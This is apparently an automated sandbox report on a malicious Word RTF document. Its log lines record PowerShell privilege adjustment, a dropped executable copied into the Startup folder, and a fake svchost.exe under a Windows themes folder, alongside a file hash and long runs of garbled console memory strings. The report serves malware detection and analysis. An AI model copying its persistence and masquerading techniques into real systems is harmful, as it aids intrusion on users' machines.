                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2EE NtQuerySystemInformation,15_2_01CAB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAB2CC NtQuerySystemInformation,15_2_01CAB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_020DB2EE NtQuerySystemInformation,16_2_020DB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_020DB2CC NtQuerySystemInformation,16_2_020DB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_01D5B2EE NtQuerySystemInformation,21_2_01D5B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_01D5B2CC NtQuerySystemInformation,21_2_01D5B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_01F4B2EE NtQuerySystemInformation,23_2_01F4B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_01F4B2CC NtQuerySystemInformation,23_2_01F4B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0057B2EE NtQuerySystemInformation,25_2_0057B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0057B2CC NtQuerySystemInformation,25_2_0057B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01E9B2EE NtQuerySystemInformation,27_2_01E9B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01E9B2CC NtQuerySystemInformation,27_2_01E9B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_01E0B2EE NtQuerySystemInformation,29_2_01E0B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_01E0B2CC NtQuerySystemInformation,29_2_01E0B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_01F4B2EE NtQuerySystemInformation,32_2_01F4B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_01F4B2CC NtQuerySystemInformation,32_2_01F4B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_01CFB2EE NtQuerySystemInformation,34_2_01CFB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_01CFB2CC NtQuerySystemInformation,34_2_01CFB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0049B2EE NtQuerySystemInformation,36_2_0049B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0049B2CC NtQuerySystemInformation,36_2_0049B2CC
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_003604883_2_00360488
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_00360B093_2_00360B09
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_00360B703_2_00360B70
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_025A1D3A4_2_025A1D3A
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_002F048812_2_002F0488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_002F0B0912_2_002F0B09
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_002F0B7012_2_002F0B70
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_02851C6016_2_02851C60
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_0026048819_2_00260488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_00260B7019_2_00260B70
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_0026069119_2_00260691
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_01F61BE232_2_01F61BE2
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 38_2_0050048838_2_00500488
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 38_2_00500B7038_2_00500B70
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 38_2_0050069138_2_00500691
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\srt.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: Joe Sandbox ViewDropped File: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                      Source: srt.exe, 00000003.00000002.2187112009.00000000080E0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2102822983.0000000002B30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winRTF@57/24@2/1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01D0ACEE AdjustTokenPrivileges,4_2_01D0ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01D0ACB7 AdjustTokenPrivileges,4_2_01D0ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01D5ACEE AdjustTokenPrivileges,6_2_01D5ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01D5ACB7 AdjustTokenPrivileges,6_2_01D5ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_01DFACEE AdjustTokenPrivileges,8_2_01DFACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_01DFACB7 AdjustTokenPrivileges,8_2_01DFACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01EDACEE AdjustTokenPrivileges,10_2_01EDACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_01EDACB7 AdjustTokenPrivileges,10_2_01EDACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01B9ACEE AdjustTokenPrivileges,13_2_01B9ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01B9ACB7 AdjustTokenPrivileges,13_2_01B9ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACEE AdjustTokenPrivileges,15_2_01CAACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CAACB7 AdjustTokenPrivileges,15_2_01CAACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_020DACEE AdjustTokenPrivileges,16_2_020DACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_020DACB7 AdjustTokenPrivileges,16_2_020DACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_01D5ACEE AdjustTokenPrivileges,21_2_01D5ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_01D5ACB7 AdjustTokenPrivileges,21_2_01D5ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_01F4ACEE AdjustTokenPrivileges,23_2_01F4ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_01F4ACB7 AdjustTokenPrivileges,23_2_01F4ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0057ACEE AdjustTokenPrivileges,25_2_0057ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_0057ACB7 AdjustTokenPrivileges,25_2_0057ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01E9ACEE AdjustTokenPrivileges,27_2_01E9ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01E9ACB7 AdjustTokenPrivileges,27_2_01E9ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_01E0ACEE AdjustTokenPrivileges,29_2_01E0ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 29_2_01E0ACB7 AdjustTokenPrivileges,29_2_01E0ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_01F4ACEE AdjustTokenPrivileges,32_2_01F4ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 32_2_01F4ACB7 AdjustTokenPrivileges,32_2_01F4ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_01CFACEE AdjustTokenPrivileges,34_2_01CFACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 34_2_01CFACB7 AdjustTokenPrivileges,34_2_01CFACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0049ACEE AdjustTokenPrivileges,36_2_0049ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_0049ACB7 AdjustTokenPrivileges,36_2_0049ACB7
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der-confirmation.doc__.rtfJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC3AC.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................v......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P..............................w......................0.......#.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................:w......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................Ww......................0......./.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P..............................w......................0.......;...............|.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P..............................w......................0.......;.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G.......H.n.....".......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P..............................w......................0.......G.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P..............................x......................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................9x......................0.......S.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.............................cx......................0......._.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P..............................x......................0......._.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P..............................x......................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P..............................x......................0.......k.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.n.....2.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P..............................y......................0.......w.......H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$.......>y......................0.......................l.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................$.......\y......................0...............H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................y......................0...............H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y......................0...............H.n.............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....8........................~......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....8........................~......................0.......#.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....8........................~......................0......./.......................H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....8...............................................0......./.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....8.......................<.......................0.......;...............|.......H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....8.......................X.......................0.......;.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......8.......".......H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....8...............................................0.......G.......8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....8...............$...............................0.......S.......................H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....8...............$...............................0.......S.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....8...............$...............................0......._.......................H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....8...............$.......;.......................0......._.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.................f.......................0.......k.......8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....8...............................................0.......k.......8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....8...............................................0.......w.......................H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....8...............................................0.......w.......8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............8.......2.......H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....8.......................(.......................0...............8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....8.......................U.......................0.......................l.......H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....8.......................p.......................0...............8...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....8...............................................0...............8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....8...............................................0...............8...............H...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................$...............................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................$...............................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$......./.......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................$.......J.......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$.......r.......................0.......;...............|.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................$...............................0.......;.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................t...............................0.......G.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................t...............................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................t...............................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................t.......@.......................0......._.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................t.......[.......................0......._.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........t...............................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................t...............................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................t...............................0.......w.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................t...............................0.......w.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......................2.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................t.......%.......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................t.......M.......................0.......................l.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................t.......h.......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................t...............................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................t...............................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............$...............................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....l...............$...............................0.......#.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............t...............................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....l...............t...............................0......./.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l...............t.......G.......................0.......;...............|.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....l...............t.......b.......................0.......;.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......X.......".......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....l...............t...............................0.......G.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............t...............................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....l...............t...............................0.......S.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.....l.......................".......................0......._.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....l...............$.......G.......................0......._.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l.......................w.......................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....l...............................................0.......k.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......X.......2.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....l...............$...............................0.......w.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............$...............................0.......................l.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l...............t.......*.......................0...............X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....l.......................[.......................0...............X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....l.......................v.......................0...............X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................2.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................r.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................H...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................H...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................>.......................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............................e.......................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................H...............................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................v.......................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................0.......x.......................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................0...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................0...............................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................\...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................\.......7.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............(.......\...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............(.......\...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............(.......0...............................0......./.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............(.......0...............................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............(.......0...............................0.......;...............|.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............(.......0.......*.......................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......U.......................0.......G...............".......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............(.......0.......r.......................0.......G.......................H...............
